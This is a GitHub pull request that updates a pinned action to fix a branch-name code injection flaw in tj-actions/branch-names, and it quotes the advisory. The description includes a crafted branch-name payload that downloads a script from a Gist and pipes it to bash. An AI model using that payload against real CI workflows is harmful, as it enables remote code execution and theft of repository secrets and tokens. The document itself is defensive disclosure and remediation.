### PR TITLE
Code Injection Security Fix

### DIFF
--- a/.github/workflows/create-slot-name.yml
+++ b/.github/workflows/create-slot-name.yml
@@ -20,7 +20,7 @@ jobs:
       # Uses v6
       - name: Get branch name
         id: branch-name
-        uses: tj-actions/branch-names@2e5354c6733793113f416314375826df030ada23
+        uses: tj-actions/branch-names@6871f53176ad61624f978536bbf089c574dc19a2
 
         #Remove forward slash from name as its invalid for deployment slot name.
         # Uses v2


### PR DESCRIPTION
tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection

## Issue Type

<!-- ignore-task-list-start -->
- [X] 🪲 Fix
<!-- ignore-task-list-end -->

## Description

- Updated action to avoid branch name code injection.

This was identified via Dependabot.

See:
https://github.com/SmarterTechnologies/GithubWorkflows/pull/43#issuecomment-2012856349

Summary
The tj-actions/branch-names GitHub Actions references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details
The vulnerable code is within the action.yml file the run step references the value directly, instead of a sanitized variable.

```text
runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")
```          
An attacker can use a branch name to inject arbitrary code, for example: ```Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo``` will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact
An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Reference
https://securitylab.github.com/research/github-actions-untrusted-input